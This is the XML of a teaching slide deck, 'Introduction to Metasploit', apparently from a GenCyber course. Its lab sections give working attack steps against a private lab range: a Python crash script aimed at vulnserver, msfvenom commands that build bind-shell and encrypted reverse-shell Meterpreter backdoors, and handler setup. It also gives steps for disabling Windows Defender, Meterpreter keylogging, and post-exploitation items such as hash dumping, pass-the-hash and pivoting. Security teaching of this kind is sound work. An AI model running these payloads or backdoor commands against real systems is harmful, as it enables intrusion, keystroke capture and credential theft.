              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>/GenCyber/attack/DoS.py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1085850" y="2428875"/>
            <a:ext cx="7600950" cy="4071937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 This module "socket" provides access to the BSD socket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socket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This module "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" performs conversions between Python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and C </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>structs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> represented as Python bytes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struct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 = '192.168.7.62'   # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vitcim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 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PORT = 9999         # victim port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 Payload to inject into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vulnserver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PAYLOAD = (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b'KNOCK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /.:/' +  # TRUN command of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b'A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>' * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5000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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>socket.create_connection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>((HOST, PORT)) as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fd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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fd.sendall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(PAYLOAD)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33881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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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engineering can be broadly defined as a process of extracting sensitive information (such as usernames and passwords) by trick. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hackers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>sometimes use fake websites and phishing attacks for this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>purpose.</a:t>
            </a:r>
          </a:p>
          <a:p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can perform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Phishing Campaign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74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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> has in-built options that you can use to generate reports to summarize all your activities and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>findings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95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cyber attack cycle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metasploit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Armitage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hands-on labs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69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bind-shell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5883366" y="2043117"/>
            <a:ext cx="3132056" cy="3443288"/>
            <a:chOff x="5297569" y="1563207"/>
            <a:chExt cx="3132056" cy="3443288"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="Picture 6" descr="Server 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7569" y="1563207"/>
              <a:ext cx="3132056" cy="3443288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867295" y="2617805"/>
              <a:ext cx="1538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Chat server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(Port </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>9998)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570" y="2518180"/>
            <a:ext cx="2284091" cy="2082400"/>
            <a:chOff x="1043238" y="2461026"/>
            <a:chExt cx="2284091" cy="2082400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="Picture 4" descr="Snoopy the Hacker by moruku on DeviantArt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43238" y="2830358"/>
              <a:ext cx="2284091" cy="171306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149307" y="2461026"/>
              <a:ext cx="2163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White hat hacker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2598661" y="3518705"/>
            <a:ext cx="4073602" cy="1031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6383" y="3172415"/>
            <a:ext cx="214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Msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{backdoor </a:t>
            </a:r>
          </a:p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(port 11111)}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3660" y="516472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Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>192.168.7.62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757" y="4646746"/>
            <a:ext cx="190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Kali</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>192.168.7.129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453092" y="4098512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backdoor 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(port 11111)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07500" y="332986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python3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300395" y="3935086"/>
            <a:ext cx="5252805" cy="435715"/>
            <a:chOff x="1300395" y="3649332"/>
            <a:chExt cx="5252805" cy="435715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598661" y="3952873"/>
              <a:ext cx="3954539" cy="190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300395" y="3715715"/>
              <a:ext cx="1535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Metasploit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01761" y="3649332"/>
              <a:ext cx="281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 exploitation tricks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72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19705 -2.22222E-6 C 0.28542 -2.22222E-6 0.39427 0.03727 0.39427 0.06759 L 0.39427 0.13519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05" y="675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20" grpId="0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Turn off Windows Virus &amp; Threat Protection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Type here to search and run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>virus &amp; threat protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Under </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Virus &amp; threat protection setting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Manage settings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Turn the following settings </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>off</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Real-time protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Cloud-delivered protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Automatic sample submission</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Tamper </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>protection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5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Create bind-shell.py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1302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i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>cp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t> reverse-shell.py bind-shell.py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Change the victim IP and SHELL of bind-shell.py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SHELL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> -p windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>bind_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> RHOST=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.7.62</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> LPORT=11111 EXITFUNC=thread -f python -v SHELL -b '\x00\x0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>'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39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 starts vulnserver.exe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Plant backdoor: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>python3 bind-shell.py</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Within </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>exploit/multi/handler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>PAYLOAD windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>bind_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>EXITFUNC thread</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>RHOST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.7.62</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>LPORT 11111</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>exploit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/>
              <a:t>. Post- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exploitation: Keylogging via Meterpreter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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>keyscan_start</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>keyscan_dump</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>keyscan_stop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84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 reverse-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tcp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Turn off Windows Virus &amp; Threat Protection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Type here to search and run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>virus &amp; threat protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Under </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Virus &amp; threat protection setting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Manage settings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Turn the following settings </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>off</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Real-time protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Cloud-delivered protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Automatic sample submission</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Tamper </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>protection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4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game: Denial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service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/>
              <a:t>Introduction to cyber attack cycle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Introduction to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metasploit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Armitage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Hands-on labs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52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Msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to Create Backdoor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39730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Command to create a backdoor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>--encrypt aes256 -p windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> LHOST=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.7.129</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> LPORT=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4545</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> -f exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fine2.exe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Copy fine2.exe to Windows VM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Open a command console (cmd.exe)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>scp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>-P 2022 kali@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.7.129</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>:~/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fine2.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>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84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Click </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>Applications</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>08 – exploitation tools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>→ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>framework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use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>exploit/multi/handler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set PAYLOAD windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>set LHOST 192.168.7.129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set LPORT 4545</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>exploit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Now click fine2.exe on Windows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Get a shell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Run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>to show folder 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5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/>
              <a:t>. Post- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exploitation: Keylogging via Meterpreter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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>keyscan_start</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>keyscan_dump</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>keyscan_stop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Armitage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9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Armitage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Scan the cyber range</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Scan home network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Deploy attacks against </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metasploitable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5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Attack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15454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http://www.fastandeasyhacking.com/images/hacking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1311030"/>
            <a:ext cx="6076085" cy="54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 Attack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Launches scans and imports data from many security scanners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Choose exploits and optionally check which exploits will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3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Attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Steps (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cont’d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 smtClean="0"/>
              <a:t>Perform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>post-exploitation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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Escalate your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>privileges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3"/>
              </a:rPr>
              <a:t>Log keystrokes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4"/>
              </a:rPr>
              <a:t>Dump </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>hashes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5"/>
              </a:rPr>
              <a:t>Browse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>the file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>system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>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>shells</a:t>
            </a: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dirty="0"/>
              <a:t>Setup and use pivots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compromised hosts as a hop to attack your target's network from the inside.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target is on the Internet or in a network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The attacker is not on the target computer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The attacker attacks the target remotely from its own/local computer against a target which is not its own/local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credentials/Pass the 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possible credentials to try to log into the target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sometimes, the target accepts the credential hash </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pass the hash to login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1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16170</TotalTime>
  <Words>1574</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>344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Times New Roman</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Theme1</vt:lpstr>
      <vt:lpstr>Introduction to  Metasploit</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Motivating Game</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Cyber Attack Cycle</vt:lpstr>
      <vt:lpstr>Cyber Attack Step</vt:lpstr>
      <vt:lpstr>Cyber Attack Steps (Cont’d)</vt:lpstr>
      <vt:lpstr>Remote Exploit</vt:lpstr>
      <vt:lpstr>Use credentials/Pass the hash</vt:lpstr>
      <vt:lpstr>Client Side Attack</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>metasploit</vt:lpstr>
      <vt:lpstr>Tutorials</vt:lpstr>
      <vt:lpstr>Start Metasploit in Kali</vt:lpstr>
      <vt:lpstr>Armitage</vt:lpstr>
      <vt:lpstr> Vulnerable Targets</vt:lpstr>
      <vt:lpstr>Armitage Interface</vt:lpstr>
      <vt:lpstr>1. Armitage Scanning</vt:lpstr>
      <vt:lpstr>2. Armitage Exploitation</vt:lpstr>
      <vt:lpstr>3. Armitage Post Exploitation</vt:lpstr>
      <vt:lpstr>Script Kiddy Use of Armitage </vt:lpstr>
      <vt:lpstr>Exploit using Command Prompt</vt:lpstr>
      <vt:lpstr>Terms</vt:lpstr>
      <vt:lpstr>Collect Credentials</vt:lpstr>
      <vt:lpstr>msfvenom</vt:lpstr>
      <vt:lpstr>Brute-Force Attacks</vt:lpstr>
      <vt:lpstr>Maintaining Access</vt:lpstr>
      <vt:lpstr>Meterpreter commands!!!</vt:lpstr>
      <vt:lpstr>Screen Capture!!!</vt:lpstr>
      <vt:lpstr>Social Engineering</vt:lpstr>
      <vt:lpstr>Reports</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>1. Turn off Windows Virus &amp; Threat Protection </vt:lpstr>
      <vt:lpstr>2 Create bind-shell.py</vt:lpstr>
      <vt:lpstr>3 Attack</vt:lpstr>
      <vt:lpstr>4. Post- Exploitation: Keylogging via Meterpreter </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>1. Turn off Windows Virus &amp; Threat Protection </vt:lpstr>
      <vt:lpstr>2. Msfvenom to Create Backdoor</vt:lpstr>
      <vt:lpstr>3. Metasploit</vt:lpstr>
      <vt:lpstr>4. Post- Exploitation: Keylogging via Meterpreter </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Armitage Lab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1326</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">1995-06-02T21:27:28Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-22T13:34:25Z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